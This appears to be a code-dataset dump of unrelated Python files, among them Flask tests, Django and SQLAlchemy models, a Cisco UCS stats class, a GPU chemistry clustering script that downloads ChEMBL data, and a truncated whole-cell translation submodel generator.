content
stringlengths 5
1.05M
|
|---|
import json
import pytest
from app import app
@pytest.fixture
def client():
return app.test_client()
def test_response_success(client):
response = client.get('/0')
expected_response = {
'extenso': 'zero'
}
assert json.loads(response.data) == expected_response
def test_response_error(client):
response = client.get('/1000000')
expected_response = {
"message": "Number out of range"
}
assert json.loads(response.data) == expected_response
|
# From https://stackoverflow.com/a/31736883
from config.config import IS_WINDOWS
if (IS_WINDOWS == True):
import msvcrt
else:
import sys
import select
import termios
# Courtesy from pokeyrule (https://github.com/pokey)
class KeyPoller():
def __enter__(self):
if (IS_WINDOWS == False):
# Save the terminal settings
self.fd = sys.stdin.fileno()
self.new_term = termios.tcgetattr(self.fd)
self.old_term = termios.tcgetattr(self.fd)
# New terminal setting unbuffered
self.new_term[3] = (self.new_term[3] & ~termios.ICANON & ~termios.ECHO)
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.new_term)
return self
def __exit__(self, type, value, traceback):
if(IS_WINDOWS == False ):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old_term)
def poll(self):
if( IS_WINDOWS == True ):
if( msvcrt.kbhit() ):
return msvcrt.getch().decode()
else:
dr,dw,de = select.select([sys.stdin], [], [], 0)
if not dr == []:
return sys.stdin.read(1)
return None
|
import numpy as np
def split_by_timestamp(df_all, col="timestamp", perc=90):
split_timestamp = np.percentile(df_all.timestamp, perc)
df_train = df_all[df_all[col] <= split_timestamp]
df_val = df_all[(df_all[col] > split_timestamp)]
return df_train, df_val
|
"""
Analysis of scenes (features, or parts of segmented images).
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id$
"""
from __future__ import unicode_literals
from __future__ import absolute_import
__version__ = "$Revision$"
from .em_lm_correlation import EmLmCorrelation
from .neighborhood import Neighborhood
from .cleft_regions import CleftRegions
from .segmentation_analysis import SegmentationAnalysis
from .multi_cluster import MultiCluster
# Not good because it makes pyto.scene.test a method, so importing
# pyto.scene.test.common doesn't work
#import test
#from numpy.testing import Tester
#test = Tester().test
|
"""Tasks related to creation of notifications"""
from . import slack
__all__ = ["slack"]
|
from django.db import models
class VesselManager(object):
def create(self, code):
if not code:
raise ValueError("Vessel code can't be empty")
vessel = Vessel(code=code)
vessel.save()
return vessel
class EquipmentManager(object):
def create(self, code, name, location, vessel_code, status='active'):
if not code:
raise ValueError("Equipment code can't be empty")
if not name:
raise ValueError("Equipment name can't be empty")
if not location:
raise ValueError("Equipment location can't be empty")
if not vessel_code:
raise ValueError("Equipment vessel_code can't be empty")
equipment = Equipment(code=code, name=name, vessel_code=vessel_code,
location=location, status=status)
equipment.save()
return equipment
# Create your models here.
class Vessel(models.Model):
code = models.CharField(max_length=200, unique=True)
def __str__(self):
return self.code
class Equipment(models.Model):
code = models.CharField(max_length=200, unique=True)
name = models.CharField(max_length=200)
vessel_code = models.CharField(max_length=200)
location = models.CharField(max_length=200)
status = models.CharField(max_length=200, default='active')
|
"""This module contains the general information for StorageHddMotherBoardTempStats ManagedObject."""
from ...ucscmo import ManagedObject
from ...ucsccoremeta import UcscVersion, MoPropertyMeta, MoMeta
from ...ucscmeta import VersionMeta
class StorageHddMotherBoardTempStatsConsts():
LEFT_INLET_TEMP_NOT_APPLICABLE = "not-applicable"
LEFT_INLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
LEFT_INLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
LEFT_INLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
LEFT_OUTLET_TEMP_NOT_APPLICABLE = "not-applicable"
LEFT_OUTLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
LEFT_OUTLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
LEFT_OUTLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
RIGHT_INLET_TEMP_NOT_APPLICABLE = "not-applicable"
RIGHT_INLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
RIGHT_INLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
RIGHT_INLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
RIGHT_OUTLET_TEMP_NOT_APPLICABLE = "not-applicable"
RIGHT_OUTLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
RIGHT_OUTLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
RIGHT_OUTLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
SUSPECT_FALSE = "false"
SUSPECT_NO = "no"
SUSPECT_TRUE = "true"
SUSPECT_YES = "yes"
class StorageHddMotherBoardTempStats(ManagedObject):
"""This is StorageHddMotherBoardTempStats class."""
consts = StorageHddMotherBoardTempStatsConsts()
naming_props = set([])
mo_meta = MoMeta("StorageHddMotherBoardTempStats", "storageHddMotherBoardTempStats", "hdd-mobo-temp-stats", VersionMeta.Version151a, "OutputOnly", 0xf, [], ["admin", "operations", "read-only"], [], [u'storageHddMotherBoardTempStatsHist'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version151a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"intervals": MoPropertyMeta("intervals", "intervals", "uint", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"left_inlet_temp": MoPropertyMeta("left_inlet_temp", "leftInletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_inlet_temp_avg": MoPropertyMeta("left_inlet_temp_avg", "leftInletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_inlet_temp_max": MoPropertyMeta("left_inlet_temp_max", "leftInletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_inlet_temp_min": MoPropertyMeta("left_inlet_temp_min", "leftInletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_outlet_temp": MoPropertyMeta("left_outlet_temp", "leftOutletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_outlet_temp_avg": MoPropertyMeta("left_outlet_temp_avg", "leftOutletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_outlet_temp_max": MoPropertyMeta("left_outlet_temp_max", "leftOutletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"left_outlet_temp_min": MoPropertyMeta("left_outlet_temp_min", "leftOutletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"normalized_time_col": MoPropertyMeta("normalized_time_col", "normalizedTimeCol", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [], []),
"right_inlet_temp": MoPropertyMeta("right_inlet_temp", "rightInletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_inlet_temp_avg": MoPropertyMeta("right_inlet_temp_avg", "rightInletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_inlet_temp_max": MoPropertyMeta("right_inlet_temp_max", "rightInletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_inlet_temp_min": MoPropertyMeta("right_inlet_temp_min", "rightInletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_outlet_temp": MoPropertyMeta("right_outlet_temp", "rightOutletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_outlet_temp_avg": MoPropertyMeta("right_outlet_temp_avg", "rightOutletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_outlet_temp_max": MoPropertyMeta("right_outlet_temp_max", "rightOutletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"right_outlet_temp_min": MoPropertyMeta("right_outlet_temp_min", "rightOutletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"stats_reported": MoPropertyMeta("stats_reported", "statsReported", "int", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version151a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"suspect": MoPropertyMeta("suspect", "suspect", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["false", "no", "true", "yes"], []),
"thresholded": MoPropertyMeta("thresholded", "thresholded", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"time_collected": MoPropertyMeta("time_collected", "timeCollected", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [], []),
"update": MoPropertyMeta("update", "update", "uint", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"intervals": "intervals",
"leftInletTemp": "left_inlet_temp",
"leftInletTempAvg": "left_inlet_temp_avg",
"leftInletTempMax": "left_inlet_temp_max",
"leftInletTempMin": "left_inlet_temp_min",
"leftOutletTemp": "left_outlet_temp",
"leftOutletTempAvg": "left_outlet_temp_avg",
"leftOutletTempMax": "left_outlet_temp_max",
"leftOutletTempMin": "left_outlet_temp_min",
"normalizedTimeCol": "normalized_time_col",
"rightInletTemp": "right_inlet_temp",
"rightInletTempAvg": "right_inlet_temp_avg",
"rightInletTempMax": "right_inlet_temp_max",
"rightInletTempMin": "right_inlet_temp_min",
"rightOutletTemp": "right_outlet_temp",
"rightOutletTempAvg": "right_outlet_temp_avg",
"rightOutletTempMax": "right_outlet_temp_max",
"rightOutletTempMin": "right_outlet_temp_min",
"rn": "rn",
"statsReported": "stats_reported",
"status": "status",
"suspect": "suspect",
"thresholded": "thresholded",
"timeCollected": "time_collected",
"update": "update",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.intervals = None
self.left_inlet_temp = None
self.left_inlet_temp_avg = None
self.left_inlet_temp_max = None
self.left_inlet_temp_min = None
self.left_outlet_temp = None
self.left_outlet_temp_avg = None
self.left_outlet_temp_max = None
self.left_outlet_temp_min = None
self.normalized_time_col = None
self.right_inlet_temp = None
self.right_inlet_temp_avg = None
self.right_inlet_temp_max = None
self.right_inlet_temp_min = None
self.right_outlet_temp = None
self.right_outlet_temp_avg = None
self.right_outlet_temp_max = None
self.right_outlet_temp_min = None
self.stats_reported = None
self.status = None
self.suspect = None
self.thresholded = None
self.time_collected = None
self.update = None
ManagedObject.__init__(self, "StorageHddMotherBoardTempStats", parent_mo_or_dn, **kwargs)
|
import configparser
from datetime import datetime
from fellowcrm import db
from flask_login import current_user
import json
config = configparser.ConfigParser()
config.read('acitivities.ini')
class Activity(db.Model):
id = db.Column(db.Integer, db.Sequence('activity_id_seq'), primary_key=True)
typ = db.Column(db.String(100))
parent_typ = db.Column(db.String(100))
name = db.Column(db.String(100))
parent_name = db.Column(db.String(100))
priority = db.Column(db.String(50))
status = db.Column(db.String(50))
description = db.Column(db.Text)
date_due = db.Column(db.DateTime)
date_start = db.Column(db.DateTime)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
date_modified = db.Column(db.DateTime, nullable=False, onupdate=datetime.utcnow)
def __repr__(self):
return f"Activity('{self.name}')"
|
#!/opt/conda/envs/rapids/bin/python3
#
# Copyright 2020 NVIDIA Corporation
# SPDX-License-Identifier: Apache-2.0
import os, wget, gzip
import hashlib
import logging
from datetime import datetime
from dask.distributed import Client, LocalCluster
import dask_cudf
import dask.bag as db
import cudf, cuml
import pandas as pd
import numpy as np
import sklearn.cluster
import sklearn.decomposition
import umap
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from chembl_webresource_client.new_client import new_client
from chembl_webresource_client.utils import utils
from PIL import Image
import chemvisualize
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('nvChemViz')
formatter = logging.Formatter(
'%(asctime)s %(name)s [%(levelname)s]: %(message)s')
###############################################################################
#
# function defs: np2cudf
#
###############################################################################
def np2dataframe(df, enable_gpu):
# convert numpy array to cuDF dataframe
df = pd.DataFrame({'fea%d'%i:df[:,i] for i in range(df.shape[1])})
if not enable_gpu:
return df
return cudf.DataFrame(df)
def MorganFromSmiles(smiles, radius=2, nBits=512):
m = Chem.MolFromSmiles(smiles)
fp = AllChem.GetMorganFingerprintAsBitVect(m, radius=radius, nBits=nBits)
ar = np.array(fp)
return ar
def ToNpArray(fingerprints):
fingerprints = np.asarray(fingerprints, dtype=np.float32)
return fingerprints
###############################################################################
#
# Download SMILES from FTP
#
###############################################################################
def dl_chemreps(chemreps_local_path='/data/chembl_26_chemreps.txt.gz'):
chemreps_url = 'ftp://ftp.ebi.ac.uk/pub/databases/chembl/ChEMBLdb/releases/chembl_26/chembl_26_chemreps.txt.gz'
chemreps_sha256 = '0585b113959592453c2e1bb6f63f2fc9d5dd34be8f96a3a3b3f80e78d5dbe1bd'
chemreps_exists_and_is_good = False
while not chemreps_exists_and_is_good:
if os.path.exists(chemreps_local_path):
with open(chemreps_local_path, 'rb') as file:
local_sha256 = hashlib.sha256(file.read()).hexdigest()
if chemreps_sha256==local_sha256:
chemreps_exists_and_is_good = True
logger.info('chembl chemreps file found locally, SHA256 matches')
if not chemreps_exists_and_is_good:
logger.info('downloading chembl chemreps file...')
wget.download(chemreps_url, chemreps_local_path)
###############################################################################
#
# MAIN
#
###############################################################################
if __name__=='__main__':
# start dask cluster
logger.info('Starting dash cluster...')
cluster = LocalCluster(dashboard_address=':9001', n_workers=12)
client = Client(cluster)
enable_gpu = True
max_molecule = 10000
pca_components = 64 # Number of PCA components or False to not use PCA
# ensure we have data
dl_chemreps()
smiles_list = []
chemblID_list = []
count=1
chemreps_local_path = '/data/chembl_26_chemreps.txt.gz'
with gzip.open(chemreps_local_path, 'rb') as fp:
fp.__next__()
for i,line in enumerate(fp):
fields = line.split()
chemblID_list.append(fields[0].decode("utf-8"))
smiles_list.append(fields[1].decode("utf-8"))
count+=1
if count>max_molecule:
break
logger.info('Initializing Morgan fingerprints...')
results = db.from_sequence(smiles_list).map(MorganFromSmiles).compute()
np_fingerprints = np.stack(results).astype(np.float32)
# take np.array shape (n_mols, nBits) for GPU DataFrame
df_fingerprints = np2dataframe(np_fingerprints, enable_gpu)
# prepare one set of clusters
if pca_components:
task_start_time = datetime.now()
if enable_gpu:
pca = cuml.PCA(n_components=pca_components)
else:
pca = sklearn.decomposition.PCA(n_components=pca_components)
df_fingerprints = pca.fit_transform(df_fingerprints)
print('Runtime PCA time (hh:mm:ss.ms) {}'.format(
datetime.now() - task_start_time))
else:
pca = False
print('PCA has been skipped')
task_start_time = datetime.now()
n_clusters = 7
if enable_gpu:
kmeans_float = cuml.KMeans(n_clusters=n_clusters)
else:
kmeans_float = sklearn.cluster.KMeans(n_clusters=n_clusters)
kmeans_float.fit(df_fingerprints)
print('Runtime Kmeans time (hh:mm:ss.ms) {}'.format(
datetime.now() - task_start_time))
# UMAP
task_start_time = datetime.now()
if enable_gpu:
umap = cuml.UMAP(n_neighbors=100,
a=1.0,
b=1.0,
learning_rate=1.0)
else:
umap = umap.UMAP()
Xt = umap.fit_transform(df_fingerprints)
print('Runtime UMAP time (hh:mm:ss.ms) {}'.format(
datetime.now() - task_start_time))
if enable_gpu:
df_fingerprints.add_column('x', Xt[0].to_array())
df_fingerprints.add_column('y', Xt[1].to_array())
df_fingerprints.add_column('cluster', kmeans_float.labels_)
else:
df_fingerprints['x'] = Xt[:,0]
df_fingerprints['y'] = Xt[:,1]
df_fingerprints['cluster'] = kmeans_float.labels_
# start dash
v = chemvisualize.ChemVisualization(
df_fingerprints.copy(), n_clusters, chemblID_list,
enable_gpu=enable_gpu, pca_model=pca)
logger.info('navigate to https://localhost:5000')
v.start('0.0.0.0')
|
""" Generator for translation, protein folding and translocation submodel for eukaryotes
:Author: Yin Hoon Chew <yinhoon.chew@mssm.edu>
:Date: 2019-06-14
:Copyright: 2019, Karr Lab
:License: MIT
"""
from wc_onto import onto as wc_ontology
from wc_utils.util.units import unit_registry
import wc_model_gen.global_vars as gvar
import wc_model_gen.utils as utils
import Bio.Alphabet
import Bio.Seq
import math
import numpy
import scipy.constants
import wc_kb
import wc_lang
import wc_model_gen
ANTICODON_CODON_RECOGNITION_RULES = {
'GAA': ['TTT', 'TTC'],
'TAA': ['TTA', 'TTG'],
'CAA': ['TTG'],
'AGA': ['TCT', 'TCC', 'TCA'],
'GGA': ['TCT', 'TCC'],
'TGA': ['TCA', 'TCG'],
'CGA': ['TCG'],
'GTA': ['TAT', 'TAC'],
'GCA': ['TGT', 'TGC'],
'CCA': ['TGG'],
'AAG': ['CTT', 'CTC', 'CTA'],
'GAG': ['CTT', 'CTC'],
'TAG': ['CTA', 'CTG'],
'CAG': ['CTG'],
'AGG': ['CCT', 'CCC', 'CCA'],
'GGG': ['CCT', 'CCC'],
'TGG': ['CCA', 'CCG'],
'CGG': ['CCG'],
'GTG': ['CAT', 'CAC'],
'TTG': ['CAA', 'CAG'],
'CTG': ['CAG'],
'ACG': ['CGT', 'CGC', 'CGA'],
'GCG': ['CGT', 'CGC'],
'TCG': ['CGA', 'CGG'],
'CCG': ['CGG'],
'AAT': ['ATT', 'ATC', 'ATA'],
'GAT': ['ATT', 'ATC', 'ATA'],
'TAT': ['ATA'],
'CAT': ['ATG'],
'AGT': ['ACT', 'ACC', 'ACA'],
'GGT': ['ACT', 'ACC'],
'TGT': ['ACA', 'ACG'],
'CGT': ['ACG'],
'GTT': ['AAT', 'AAC'],
'TTT': ['AAA', 'AAG'],
'CTT': ['AAG'],
'GCT': ['AGT', 'AGC'],
'TCT': ['AGA', 'AGG'],
'CCT': ['AGG'],
'AAC': ['GTT', 'GTC', 'GTA'],
'GAC': ['GTT', 'GTC'],
'TAC': ['GTA', 'GTG'],
'CAC': ['GTG'],
'AGC': ['GCT', 'GCC', 'GCA'],
'GGC': ['GCT', 'GCC'],
'TGC': ['GCA', 'GCG'],
'CGC': ['GCG'],
'GTC': ['GAT', 'GAC'],
'TTC': ['GAA', 'GAG'],
'CTC': ['GAG'],
'ACC': ['GGT', 'GGC', 'GGA'],
'GCC': ['GGT', 'GGC'],
'TCC': ['GGA', 'GGG'],
'CCC': ['GGG'],
'TCA': ['TGA'], #selenocysteine
'AAA': ['TTT'], #natural pairing but unlikely according to the rule
'ATA': ['TAT'], #natural pairing but unlikely according to the rule
'ACA': ['TGT'], #natural pairing but unlikely according to the rule
'ATG': ['CAT'], #natural pairing but unlikely according to the rule
'ATT': ['AAT'], #natural pairing but unlikely according to the rule
'ACT': ['AGT'], #natural pairing but unlikely according to the rule
'ATC': ['GAT'], #natural pairing but unlikely according to the rule
}
UNCONDITIONAL_STOP_CODON = ['TAA', 'TAG']
CONDITIONAL_STOP_CODON = ['TGA']
class TranslationTranslocationSubmodelGenerator(wc_model_gen.SubmodelGenerator):
""" Generator for translation, protein folding and translocation submodel
Translation, protein folding and translocation processes are
modeled as three reaction steps in this submodel:
1. Translation initiation where ribosomes and methionine (or other start amino acid)
bind to the mRNA. For nuclear mRNAs, transport from the nucleus to the cytoplasm
are lumped with this reaction. The energetic of met-tRNA charging is included;
2. Translation elongation and termination are lumped into one reaction that produces
nascent polypeptides. The energetic of amino-acid-tRNA charging is included;
3. Protein folding and translocation to each organelle/compartment are lumped into
one reaction
Options:
* cytoplasmic_ribosome (:obj:`str`): name of cytoplasmic ribosome
* mitochondrial_ribosome (:obj:`str`): name of mitochondrial ribosome
* cytoplasmic_initiation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
initiation factors in the cytoplasm, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_initiation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
initiation factors in the mitochondria, grouped based on similar functions or classes,
the default is an empty list
* cytoplasmic_elongation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
elongation factors in the cytoplasm, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_elongation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
elongation factors in the mitochondria, grouped based on similar functions or classes,
the default is an empty list
* cytoplasmic_chaperones (:obj:`list` of :obj:`list`): list of lists of the name of
chaperones in the cytoplasm, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_chaperones (:obj:`list` of :obj:`list`): list of lists of the name of
chaperones in the mitochondria, grouped based on similar functions or classes,
the default is an empty list
* er_chaperones (:obj:`list` of :obj:`list`): list of lists of the name of
chaperones in the endoplasmic reticulum, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_exosome (:obj:`str`): the name of exosome complex that degrades RNAs in
the mitochondria
* amino_acid_id_conversion (:obj:`dict`): a dictionary with amino acid standard ids
as keys and amino acid metabolite ids as values
* codon_table (:obj:`dict`, optional): a dictionary with protein id as key and
NCBI identifier for translation table as value, the default is 1 (standard table)
for all protein
* cds (:obj:`bool`, optional): True indicates the sequences of protein are complete CDS,
the default is True
* beta (:obj:`float`, optional): ratio of Michaelis-Menten constant to substrate
concentration (Km/[S]) for use when estimating Km values, the default value is 1
* polysome_fraction (:obj:`dict`): a dictionary with mRNA ids as keys and
fraction of total cellular ribosomes the mRNA is bound to
* mitochondrial_cytosolic_trna_partition (:obj:`float`, optional): fraction of cellular
tRNA that would be imported into the mitochondrial for codons not covered by the
mitochondrial tRNAs, the default value is 0.01
* selenoproteome (:obj:`list`, optional): list of IDs of genes that translate into
selenoproteins, default is an empty list
"""
def clean_and_validate_options(self):
""" Apply default options and validate options """
options = self.options
if 'cytoplasmic_ribosome' not in options:
raise ValueError('The name of cytoplasmic ribosome has not been provided')
else:
cytoplasmic_ribosome = options['cytoplasmic_ribosome']
if 'mitochondrial_ribosome' not in options:
raise ValueError('The name of mitochondrial ribosome has not been provided')
else:
mitochondrial_ribosome = options['mitochondrial_ribosome']
cytoplasmic_initiation_factors = options.get('cytoplasmic_initiation_factors', [])
options['cytoplasmic_initiation_factors'] = cytoplasmic_initiation_factors
mitochondrial_initiation_factors = options.get('mitochondrial_initiation_factors', [])
options['mitochondrial_initiation_factors'] = mitochondrial_initiation_factors
cytoplasmic_elongation_factors = options.get('cytoplasmic_elongation_factors', [])
options['cytoplasmic_elongation_factors'] = cytoplasmic_elongation_factors
mitochondrial_elongation_factors = options.get('mitochondrial_elongation_factors', [])
options['mitochondrial_elongation_factors'] = mitochondrial_elongation_factors
cytoplasmic_chaperones = options.get('cytoplasmic_chaperones', [])
options['cytoplasmic_chaperones'] = cytoplasmic_chaperones
mitochondrial_chaperones = options.get('mitochondrial_chaperones', [])
options['mitochondrial_chaperones'] = mitochondrial_chaperones
er_chaperones = options.get('er_chaperones', [])
options['er_chaperones'] = er_chaperones
if 'mitochondrial_exosome' not in options:
raise ValueError('The name of mitochondrial exosome has not been provided')
else:
mitochondrial_exosome = options['mitochondrial_exosome']
if 'amino_acid_id_conversion' not in options:
raise ValueError('The dictionary amino_acid_id_conversion has not been provided')
else:
amino_acid_id_conversion = options['amino_acid_id_conversion']
codon_table = options.get('codon_table', 1)
options['codon_table'] = codon_table
cds = options.get('cds', True)
options['cds'] = cds
beta = options.get('beta', 1.)
options['beta'] = beta
if 'polysome_fraction' not in options:
raise ValueError('The dictionary polysome_fraction has not been provided')
else:
polysome_fraction = options['polysome_fraction']
mitochondrial_cytosolic_trna_partition = options.get('mitochondrial_cytosolic_trna_partition', 0.01)
assert(0. <= mitochondrial_cytosolic_trna_partition <= 1.)
options['mitochondrial_cytosolic_trna_partition'] = mitochondrial_cytosolic_trna_partition
selenoproteome = options.get('selenoproteome', [])
options['selenoproteome'] = selenoproteome
def gen_reactions(self):
""" Generate reactions associated with submodel """
model = self.model
cell = self.knowledge_base.cell
cytoplasmic_ribosome = self.options.get('cytoplasmic_ribosome')
mitochondrial_ribosome = self.options.get('mitochondrial_ribosome')
amino_acid_id_conversion = self.options.get('amino_acid_id_conversion')
codon_table = self.options['codon_table']
cds = self.options['cds']
selenoproteome = self.options['selenoproteome']
cytosol = model.compartments.get_one(id='c')
nucleus = model.compartments.get_one(id='n')
mitochondrion = model.compartments.get_one(id='m')
peroxisome = model.compartments.get_one(id='x')
# Get metabolite species involved in reaction
amino_acid_participants = list(amino_acid_id_conversion.values())
other_metabolite_participants = ['atp', 'adp', 'amp', 'gtp', 'gdp', 'pi', 'ppi', 'h2o', 'h', 'selnp']
metabolites = {}
for met in amino_acid_participants + other_metabolite_participants:
met_species_type = model.species_types.get_one(id=met)
metabolites[met] = {
'c': met_species_type.species.get_one(compartment=cytosol),
'm': met_species_type.species.get_one(compartment=mitochondrion)
}
self.submodel.framework = wc_ontology['WC:next_reaction_method']
print('Start generating translation and translocation submodel...')
# Create initiation and elongation reactions for each mRNA
init_el_rxn_no = 0
trans_rxn_no = 0
self._allowable_queue_len = {}
self._translocation_reactions = {}
mrna_kbs = [i for i in cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType) \
if i.type==wc_kb.eukaryote.TranscriptType.mRna]
for mrna_kb in mrna_kbs:
mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
if mrna_kb_compartment_id == 'c':
translation_compartment = cytosol
ribosome_complex = model.species_types.get_one(
name=cytoplasmic_ribosome).species.get_one(compartment=cytosol)
else:
translation_compartment = mitochondrion
ribosome_complex = model.species_types.get_one(
name=mitochondrial_ribosome).species.get_one(compartment=mitochondrion)
# Create initiation reaction
if mrna_kb.id in gvar.transcript_ntp_usage:
mrna_len = gvar.transcript_ntp_usage[mrna_kb.id]['len']
else:
seq = mrna_kb.get_seq()
mrna_len = len(seq)
ntp_count = gvar.transcript_ntp_usage[mrna_kb.id] = {
'A': seq.upper().count('A'),
'C': seq.upper().count('C'),
'G': seq.upper().count('G'),
'U': seq.upper().count('U'),
'len': mrna_len
}
aa_content = {}
if mrna_kb.protein.id in gvar.protein_aa_usage:
for aa, aa_id in amino_acid_id_conversion.items():
if gvar.protein_aa_usage[mrna_kb.protein.id][aa]:
aa_content[aa_id] = gvar.protein_aa_usage[mrna_kb.protein.id][aa]
else:
gvar.protein_aa_usage[mrna_kb.protein.id] = {i:0 for i in list(amino_acid_id_conversion.keys())}
if codon_table == 1:
codon_id = 1
else:
codon_id = codon_table[mrna_kb.protein.id]
_, raw_seq, start_codon = mrna_kb.protein.get_seq_and_start_codon(table=codon_id, cds=cds)
if mrna_kb.gene.id in selenoproteome:
processed_seq = raw_seq[:-1] if raw_seq.endswith('*') else raw_seq
protein_seq = ''.join(i if i!='*' else 'U' for i in processed_seq)
else:
protein_seq = ''.join(i for i in raw_seq if i!='*')
for aa in protein_seq:
aa_id = amino_acid_id_conversion[aa]
if aa_id not in aa_content:
aa_content[aa_id] = 1
gvar.protein_aa_usage[mrna_kb.protein.id][aa] = 1
else:
aa_content[aa_id] += 1
gvar.protein_aa_usage[mrna_kb.protein.id][aa] += 1
gvar.protein_aa_usage[mrna_kb.protein.id]['*'] = raw_seq.count('*')
gvar.protein_aa_usage[mrna_kb.protein.id]['len'] = len(protein_seq)
gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa'] = protein_seq[0]
gvar.protein_aa_usage[mrna_kb.protein.id]['start_codon'] = str(start_codon).upper()
first_aa = model.species_types.get_one(id=amino_acid_id_conversion[
gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa']])
ribo_binding_site_species = model.species_types.get_one(
id='{}_ribosome_binding_site'.format(mrna_kb.id)).species[0]
self._allowable_queue_len[mrna_kb.id] = (ribo_binding_site_species,
ribo_binding_site_species.distribution_init_concentration.mean)
ribo_bound_species_type = model.species_types.get_or_create(
id='ribo_bound_{}'.format(mrna_kb.id),
name='Ribosome bound {}'.format(mrna_kb.name),
type=wc_ontology['WC:pseudo_species'],
)
ribo_bound_species_type.structure = wc_lang.ChemicalStructure(
empirical_formula = ribosome_complex.species_type.structure.empirical_formula +\
first_aa.structure.empirical_formula,
molecular_weight = ribosome_complex.species_type.structure.molecular_weight +\
first_aa.structure.molecular_weight,
charge = ribosome_complex.species_type.structure.charge +\
first_aa.structure.charge,
)
ribo_bound_species = model.species.get_or_create(
species_type=ribo_bound_species_type, compartment=translation_compartment)
ribo_bound_species.id = ribo_bound_species.gen_id()
